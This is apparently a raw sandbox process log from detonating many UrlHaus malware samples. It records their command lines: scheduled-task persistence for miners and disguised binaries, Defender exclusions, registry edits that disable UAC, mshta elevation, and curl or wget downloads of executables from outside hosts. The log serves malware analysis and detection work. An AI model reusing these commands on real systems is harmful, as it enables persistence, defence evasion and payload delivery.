schtasks.exe /create /tn "inst77player_1.0.0.1i" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\inst77player_1.0.0.1.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\._cache_System.exe'

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 11 /tr "'C:\cyb\temp\powershell.exe'" /f

C:\Users\Admin\Downloads\UrlHausFiles\zcc.exe

"C:\Users\Admin\Downloads\UrlHausFiles\zcc.exe"

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\cyb\temp\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 6 /tr "'C:\cyb\temp\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Set_upS" /sc MINUTE /mo 7 /tr "'C:\Windows\DigitalLocker\Set_up.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Set_up" /sc ONLOGON /tr "'C:\Windows\DigitalLocker\Set_up.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Set_upS" /sc MINUTE /mo 8 /tr "'C:\Windows\DigitalLocker\Set_up.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "xmrigx" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Google\xmrig.exe'" /f

C:\Users\Admin\AppData\Local\Temp\Aplanogamete\IDRBackup.exe

"C:\Users\Admin\AppData\Local\Temp\Aplanogamete\IDRBackup.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "xmrig" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\xmrig.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "xmrigx" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Google\xmrig.exe'" /rl HIGHEST /f

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "81CA.tmp.zx8" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\SendTo\81CA.tmp.zx.exe'" /f

C:\Users\Admin\Downloads\UrlHausFiles\payload.exe

"C:\Users\Admin\Downloads\UrlHausFiles\payload.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "81CA.tmp.zx" /sc ONLOGON /tr "'C:\Users\Admin\SendTo\81CA.tmp.zx.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "81CA.tmp.zx8" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\SendTo\81CA.tmp.zx.exe'" /rl HIGHEST /f

C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe

"C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe" /update "C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Archivos de programa\Unico - Ventas\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Archivos de programa\Unico - Ventas\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Archivos de programa\Unico - Ventas\conhost.exe'" /rl HIGHEST /f

C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe

"C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe" /delete "C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Windows\GameBarPresenceWriter\conhost.exe'" /f

C:\Users\Admin\Downloads\UrlHausFiles\Video.scr

"C:\Users\Admin\Downloads\UrlHausFiles\Video.scr" /S

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\GameBarPresenceWriter\conhost.exe'" /rl HIGHEST /f

C:\Users\Admin\Downloads\UrlHausFiles\Video.scr

"C:\Users\Admin\Downloads\UrlHausFiles\Video.scr" /S

C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Windows\GameBarPresenceWriter\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f

C:\Users\Admin\Downloads\UrlHausFiles\nc64.exe

"C:\Users\Admin\Downloads\UrlHausFiles\nc64.exe"

C:\Windows\SystemTemp\GUMB760.tmp\GoogleUpdate.exe

C:\Windows\SystemTemp\GUMB760.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c copy /y C:\Users\Admin\Downloads\UrlHausFiles\Video.scr C:\Users\Admin\HelpPane.exe

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "qNVQKFyMq" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office\root\loc\qNVQKFyM.exe'" /f

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\getlab.exe

"C:\Users\Admin\Downloads\UrlHausFiles\getlab.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "qNVQKFyM" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\root\loc\qNVQKFyM.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "qNVQKFyMq" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\root\loc\qNVQKFyM.exe'" /rl HIGHEST /f

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc

C:\Users\Admin\AppData\Local\Temp\is-6V5M7.tmp\getlab.tmp

"C:\Users\Admin\AppData\Local\Temp\is-6V5M7.tmp\getlab.tmp" /SL5="$60C78,3379142,54272,C:\Users\Admin\Downloads\UrlHausFiles\getlab.exe"

C:\Users\Admin\Downloads\UrlHausFiles\IT_plan_cifs.exe

"C:\Users\Admin\Downloads\UrlHausFiles\IT_plan_cifs.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\HelpPane.exe --startup auto install

C:\cyb\temp\powershell.exe

"C:\cyb\temp\powershell.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C922.tmp\C923.tmp\C924.bat C:\Users\Admin\Downloads\UrlHausFiles\IT_plan_cifs.exe"

C:\Windows\system32\net.exe

net use /delete * /y

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe C:\Users\Admin\HelpPane.exe --startup auto install

C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"

C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"

C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe

"C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe"

C:\Users\Admin\Downloads\UrlHausFiles\smell-the-roses.exe

"C:\Users\Admin\Downloads\UrlHausFiles\smell-the-roses.exe"

C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\HelpPane.exe start

C:\Windows\explorer.exe

explorer.exe

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OEMzQzM0NzItMTMyNi00ODQwLUI2NUItRERFOERFOENDQzEwfSIgdXNlcmlkPSJ7QTU3Q0YwNDMtMzc4Mi00RjI3LUE2OTMtQzhCNzA0NkQ3N0UyfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0ie0UyRDZFREI4LUNCMzgtNDk4NS04MEQ1LTRFRDMxOEUxQTI1QX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIvPjxhcHAgYXBwaWQ9Ins0MzBGRDREMC1CNzI5LTRGNjEtQUEzNC05MTUyNjQ4MTc5OUR9IiB2ZXJzaW9uPSIxLjMuMzYuMzcxIiBuZXh0dmVyc2lvbj0iMS4zLjM2LjM1MiIgbGFuZz0iemgtQ04iIGJyYW5kPSIiIGNsaWVudD0iIiBpaWQ9IntEQjI0RUREMy05OTIwLTVENUYtRkJCRS04RTc0M0Y3NDg2QzF9Ij48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBpbnN0YWxsX3RpbWVfbXM9IjQ1OTgiLz48L2FwcD48L3JlcXVlc3Q-

C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe C:\Users\Admin\HelpPane.exe start

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\Documents.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Documents.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" /installsource taggedmi /sessionid "{8C3C3472-1326-4840-B65B-DDE8DE8CCC10}"

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc

C:\Windows\system32\net.exe

net use D: \\210.216.165.152\super_share smbtest@@ /user:smbtest /persistent:yes

C:\Users\Admin\Downloads\UrlHausFiles\Ammyy.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Ammyy.exe"

C:\Users\Admin\Downloads\UrlHausFiles\jp.exe

"C:\Users\Admin\Downloads\UrlHausFiles\jp.exe"

C:\Users\Admin\Downloads\UrlHausFiles\game.exe

"C:\Users\Admin\Downloads\UrlHausFiles\game.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\Downloads\UrlHausFiles\PaoNan.exe

"C:\Users\Admin\Downloads\UrlHausFiles\PaoNan.exe"

C:\Users\Admin\Downloads\UrlHausFiles\dropper64.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dropper64.exe"

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Users\Admin\Downloads\UrlHausFiles\langla.exe

"C:\Users\Admin\Downloads\UrlHausFiles\langla.exe"

C:\Users\Admin\Downloads\UrlHausFiles\sam.exe

"C:\Users\Admin\Downloads\UrlHausFiles\sam.exe"

C:\Users\Admin\Downloads\UrlHausFiles\Accounts.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Accounts.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\zke-nfoview.exe

"C:\Users\Admin\Downloads\UrlHausFiles\zke-nfoview.exe"

C:\Users\Admin\Downloads\UrlHausFiles\Meeting.sfx.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Meeting.sfx.exe"

C:\Users\Admin\Downloads\UrlHausFiles\cryptography_module_windows.exe

"C:\Users\Admin\Downloads\UrlHausFiles\cryptography_module_windows.exe"

C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe

"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"

C:\Users\Admin\Downloads\UrlHausFiles\cryptography_module_windows.exe

"C:\Users\Admin\Downloads\UrlHausFiles\cryptography_module_windows.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\osupdater.exe

"C:\Users\Admin\Downloads\UrlHausFiles\osupdater.exe"

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ExSync.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ExSync.exe"

C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\AppData\Roaming\toolsync_RO\IDRBackup.exe

C:\Users\Admin\AppData\Roaming\toolsync_RO\IDRBackup.exe

C:\Users\Admin\Downloads\UrlHausFiles\justpoc.exe

"C:\Users\Admin\Downloads\UrlHausFiles\justpoc.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1231.tmp\1232.tmp\1233.bat C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Users\Admin\Downloads\UrlHausFiles\patcher.exe

"C:\Users\Admin\Downloads\UrlHausFiles\patcher.exe"

C:\Users\Admin\Downloads\UrlHausFiles\test27.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test27.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ewm.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ewm.exe"

C:\Users\Admin\AppData\Local\Temp\ExSync.exe

"C:\Users\Admin\AppData\Local\Temp\ExSync.exe" -l "C:\Users\Admin\Downloads\UrlHausFiles\ExSync.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c pHash.bat

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'

C:\Users\Admin\Downloads\UrlHausFiles\PCSupport.exe

"C:\Users\Admin\Downloads\UrlHausFiles\PCSupport.exe"

C:\Users\Admin\AppData\Local\Temp\10000321101\stail.exe

"C:\Users\Admin\AppData\Local\Temp\10000321101\stail.exe"

C:\Users\Admin\Downloads\UrlHausFiles\VmManagedSetup.exe

"C:\Users\Admin\Downloads\UrlHausFiles\VmManagedSetup.exe"

C:\Users\Admin\AppData\Local\Temp\is-SNOON.tmp\stail.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SNOON.tmp\stail.tmp" /SL5="$10EBE,3522820,54272,C:\Users\Admin\AppData\Local\Temp\10000321101\stail.exe"

C:\Users\Admin\Downloads\UrlHausFiles\av_downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\av_downloader.exe"

C:\Users\Admin\Downloads\UrlHausFiles\Newofff.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Newofff.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\33A4.tmp\33A5.tmp\33B6.bat C:\Users\Admin\Downloads\UrlHausFiles\av_downloader.exe"

C:\Users\Admin\Downloads\UrlHausFiles\chrome_133.exe

"C:\Users\Admin\Downloads\UrlHausFiles\chrome_133.exe"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE","goto :target","","runas",1)(window.close)

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\curl.exe

curl -o "pHash" "http://144.172.71.105:1338/nova_flow/patcher.exe?hash"

C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE" goto :target

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~2.EXE","goto :target","","runas",1)(window.close)

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\39BE.tmp\39BF.tmp\39C0.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE goto :target"

C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~2.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~2.EXE" goto :target

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3FBA.tmp\4018.tmp\4019.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~2.EXE goto :target"

C:\Users\Admin\Downloads\UrlHausFiles\c3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\c3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\boot.exe

"C:\Users\Admin\Downloads\UrlHausFiles\boot.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\whats-new.exe

"C:\Users\Admin\Downloads\UrlHausFiles\whats-new.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4567.tmp\4568.tmp\4569.bat C:\Users\Admin\Downloads\UrlHausFiles\boot.exe"

C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

"C:\Users\Admin\Downloads\UrlHausFiles\file.exe"

C:\Users\Admin\Downloads\UrlHausFiles\test.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test.exe"

C:\Users\Admin\Downloads\UrlHausFiles\Sniffthem.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Sniffthem.exe"

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4A39.tmp\4A3A.tmp\4A3B.bat C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6452 -ip 6452

C:\Users\Admin\Downloads\UrlHausFiles\hiya.exe

"C:\Users\Admin\Downloads\UrlHausFiles\hiya.exe"

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6452 -s 220

C:\Users\Admin\Downloads\UrlHausFiles\x.exe

"C:\Users\Admin\Downloads\UrlHausFiles\x.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Users\Admin\Downloads\UrlHausFiles\AsyncClient.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AsyncClient.exe"

C:\Users\Admin\Downloads\UrlHausFiles\KuwaitSetupHockey.exe

"C:\Users\Admin\Downloads\UrlHausFiles\KuwaitSetupHockey.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Users\Admin\Downloads\UrlHausFiles\chisel.exe

"C:\Users\Admin\Downloads\UrlHausFiles\chisel.exe"

C:\Users\Admin\AppData\Local\Temp\is-EDBCM.tmp\KuwaitSetupHockey.tmp

"C:\Users\Admin\AppData\Local\Temp\is-EDBCM.tmp\KuwaitSetupHockey.tmp" /SL5="$1101E,3849412,851968,C:\Users\Admin\Downloads\UrlHausFiles\KuwaitSetupHockey.exe"

C:\Users\Admin\Downloads\UrlHausFiles\stories.exe

"C:\Users\Admin\Downloads\UrlHausFiles\stories.exe"

C:\Users\Admin\AppData\Roaming\wget.exe

wget "http://quanlyphongnet.com/net/Google Chrome.exe" -O "Google Chrome.exe"

C:\Users\Admin\Downloads\UrlHausFiles\config.exe

"C:\Users\Admin\Downloads\UrlHausFiles\config.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Users\Admin\Downloads\UrlHausFiles\Meeting.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Meeting.exe"

C:\Users\Admin\AppData\Local\Temp\is-OL26G.tmp\stories.tmp

"C:\Users\Admin\AppData\Local\Temp\is-OL26G.tmp\stories.tmp" /SL5="$20F1E,5532893,721408,C:\Users\Admin\Downloads\UrlHausFiles\stories.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe

"C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Users\Admin\Downloads\UrlHausFiles\cdb.exe

"C:\Users\Admin\Downloads\UrlHausFiles\cdb.exe"

C:\Users\Admin\AppData\Roaming\new.exe

C:\Users\Admin\AppData\Roaming\new.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\61F7.tmp\61F8.tmp\61F9.bat C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe"

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" pause shine-encoder_11152

C:\Users\Admin\Downloads\UrlHausFiles\jet.exe

"C:\Users\Admin\Downloads\UrlHausFiles\jet.exe"

C:\Users\Admin\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

"C:\Users\Admin\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe" -i

C:\Users\Admin\Downloads\UrlHausFiles\crss.exe

"C:\Users\Admin\Downloads\UrlHausFiles\crss.exe"

C:\Windows\system32\attrib.exe

attrib +s +h e:\net

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"

C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe

"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"

C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE" goto :target

C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe

"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"

C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe

"C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe

"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 pause shine-encoder_11152

C:\Users\Admin\Downloads\UrlHausFiles\msf.exe

"C:\Users\Admin\Downloads\UrlHausFiles\msf.exe"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\733D.tmp\733E.tmp\733F.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE goto :target"

C:\Users\Admin\Downloads\UrlHausFiles\s.exe

"C:\Users\Admin\Downloads\UrlHausFiles\s.exe"

C:\Users\Admin\AppData\Roaming\Bypass.exe

Bypass.exe

C:\Users\Admin\AppData\Local\Temp\Defender.exe

"C:\Users\Admin\AppData\Local\Temp\Defender.exe" /D

C:\Users\Admin\Downloads\UrlHausFiles\iupdate.exe

"C:\Users\Admin\Downloads\UrlHausFiles\iupdate.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 11140 -ip 11140

C:\Users\Admin\Downloads\UrlHausFiles\rrq.exe

